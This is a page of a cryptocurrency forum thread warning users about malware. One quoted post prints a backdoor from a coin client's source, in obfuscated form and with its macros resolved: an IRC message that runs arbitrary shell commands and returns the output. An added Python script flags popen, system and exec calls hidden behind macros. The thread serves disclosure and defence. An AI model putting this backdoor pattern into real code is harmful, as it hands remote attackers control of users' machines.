
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 10. (Read 834878 times)

newbie
Activity: 11
Merit: 0
I hope to have a healthy community and warn the coin to show signs of scam
member
Activity: 280
Merit: 39
Citowise-Developing Crypotpayment Infrastructure
Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but is Kaspersky not enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coin ones) like DOGE, LTC, BTC and a few more?

Yes, most malware are executable files for the Windows operating system, but this doesn't mean that malware can't affect other operating systems such as Mac and Linux distros. There are other malware and viruses that can also penetrate other operating systems. The key is to make sure that we do not easily fall into the trap of these people who are taking advantage of newbies.
fsn
member
Activity: 224
Merit: 10
Always beware of increased sophisticated malware infection attempts and just believe.
newbie
Activity: 6
Merit: 0
double authentication is the best thing you can think of !!!
I agree to the whole 100%
newbie
Activity: 98
Merit: 0
Nowadays a lot of phishing and malware-infected hacking attempts are happening due to bad guys who want to steal your personal information, especially private keys. Blockchain technology is a good technology but it still has a lot of problems that need to be addressed. I want every cryptocurrency wallet to have a double factor authentication key that works with Google Authenticator.
newbie
Activity: 2
Merit: 0
I've seen some ads on FB and Google that take you to a page that installs mining scripts too...
member
Activity: 728
Merit: 10
A year ago, my email was hacked. After that, the coins were withdrawn from the exchange. It cost about 3,5k$. 2FA had not been installed. Gmail mail return failed. Many contacts are missing.
It is better to have a special e-mail for the exchange with 2FA enabled and a special smartphone with the Google application. You don’t have to use this e-mail and smartphone for any other purposes.
member
Activity: 324
Merit: 15
I'm quite impressed by the power and imagination of hackers to find the weakness and exploit it everywhere!

Finally, you never know if you are 100% safe or not.

Just be careful as much as possible.
newbie
Activity: 113
Merit: 0
Tell me, is it true that Mac OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected.
newbie
Activity: 56
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
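// Trigger: an IRC PRIVMSG whose text starts with ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the received line, from vWords[4] on, is run as a shell command
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Sender's nick: vWords[0] without its first character, cut at '!'
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // The command output is sent back to that nick as a PRIVMSG
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}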
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
What security system to use to avoid falling into the trap of cybercriminals, and how to understand that it is cybercriminals?
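An added example, not part of the original post or of the coin's source: a small Python audit pass that resolves object-like `#define` aliases the way the "macros resolved" listing above does, and reports every line whose identifiers end up at a process-spawning call. The `#define` lines in `SAMPLE` are constructed for illustration (the post shows only the resolved result), and the `RISKY` list is an assumption to extend for your own code base.

```python
import re

# Calls that start a process or shell (assumed starting list, extend as needed).
RISKY = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp", "execve"}
# Object-like macros only: "#define NAME replacement" (function-like ones are skipped).
DEFINE = re.compile(r"^\s*#\s*define\s+(\w+)\s+(.+?)\s*$")
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")

def collect_macros(source):
    """Map each object-like macro name to its replacement text."""
    macros = {}
    for line in source.splitlines():
        m = DEFINE.match(line)
        if m:
            macros[m.group(1)] = m.group(2)
    return macros

def resolve(name, macros, depth=8):
    """Follow alias chains (A -> B -> popen); depth bounds self-referencing macros."""
    while name in macros and depth > 0:
        name, depth = macros[name].strip(), depth - 1
    return name

def expand(line, macros):
    """Rewrite a line with every alias replaced by what it resolves to."""
    return IDENT.sub(lambda m: resolve(m.group(0), macros), line)

def audit(source):
    """Return (line_no, name_as_written, real_call, text) for each risky call.
    Simplification: identifiers inside string literals and comments are scanned too."""
    macros = collect_macros(source)
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE.match(line):
            continue
        for ident in IDENT.findall(line):
            real = resolve(ident, macros)
            if real in RISKY:
                findings.append((no, ident, real, line.strip()))
    return findings

# Constructed sample: the #define lines are assumed, the body mirrors the post.
SAMPLE = '''\
#define CLine FILE
#define CRead popen
#define CFree pclose
#define CBuff "PRIVMSG"
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    CFree(buf);
}
'''

if __name__ == "__main__":
    for no, alias, real, text in audit(SAMPLE):
        print(f"line {no}: {alias} resolves to {real}: {text}")
```

A finding where the name as written differs from the real call is the case to read first, since a plain text search for `popen` would have missed it.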
copper member
Activity: 686
Merit: 2
I had a similar issue last year, when I was sent a free trading bot by an online acquaintance who I met in a Telegram trading group. I left the file to download while I took a nap, only to wake up to the most unfortunate incident: all my trading accounts were wiped. I still cannot fathom how it got access to the trading accounts without 2FA, though my phone was beside my laptop. I regret leaving my accounts opened on the browser. My advice is to abstain from downloading free software, or any application you don't understand; it's pretty risky. God help us.
jr. member
Activity: 407
Merit: 2
SmartFi - EARN, LEND & TRADE
There is a new type of malware and account stealing for MEW. It's called MEWkit. It steals money from the victim’s wallet through a front-end program that mimics MyEtherWallet.

Another one targets airdrops. They basically ask you to fill out a form with all your info and address and then redirect you to another site that is a clone of MEW. You will be requested to sign a message that will in turn steal your keys. This was reported by the official MEW account on Twitter.

Yes, it is very dangerous; we must be very careful.
I am used to bookmarking important sites to avoid being directed to such things.
I also usually check the site twice before filling in important data.
jr. member
Activity: 144
Merit: 2
This is really rampant nowadays. An offline wallet can still make us secure no matter what.
newbie
Activity: 1560
Merit: 0
I'm an invalid code and looking out the hole. sad and sorry, but do not know this copy.authenticate does not think to a currency Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry Cry
jr. member
Activity: 243
Merit: 1
Staker.network - POS Smart Contract ETH Token
I've been alarmed by this post. Sometimes it really helps when you read on a forum like this. But my concern is, how can I detect those malware infections if I don't have any experience and knowledge about the code that they're using? Sometimes I just click on links, and I don't know if clicking certain links will cause infections on my device, and I will lose all my data, or there's a possibility that I will be hacked. The online thing is really dangerous.
Anyway, this post is very informative, and keep reminding everyone to be extra careful.
newbie
Activity: 7
Merit: 0
Thank you for sharing tips and information like this. I found this link in this thread https://bitcointalksearch.org/topic/how-i-met-my-scammer-3839038 which is also quite useful to me as a new member of this forum.
newbie
Activity: 30
Merit: 0
Thanks for being on top of this and keeping us informed, we do appreciate it!
newbie
Activity: 39
Merit: 0
Are the malware attempts still going on? What care should be taken as a beginner?
newbie
Activity: 104
Merit: 0
I use antivirus Avast Premier - I forgot what viruses, rootkits and other mucks.  Very satisfied with this product!  I recommend to everyone!  It is especially important to have an antivirus if you use a software purse.
newbie
Activity: 6
Merit: 0
A year ago, my email was hacked. After that, the coins were withdrawn from the exchange. It cost about 3,5k$. 2FA had not been installed. Gmail mail return failed. Many contacts are missing.

I am deeply saddened to hear that. It's the same with my friends; they share the same reason: a hacker took a lot of their earnings. It's also a large cost and they regret what happened, but it's still a great lesson for them and they learned from what happened. So next time, be aware and secure your accounts as much as possible; we put so much effort and time into earning those tokens.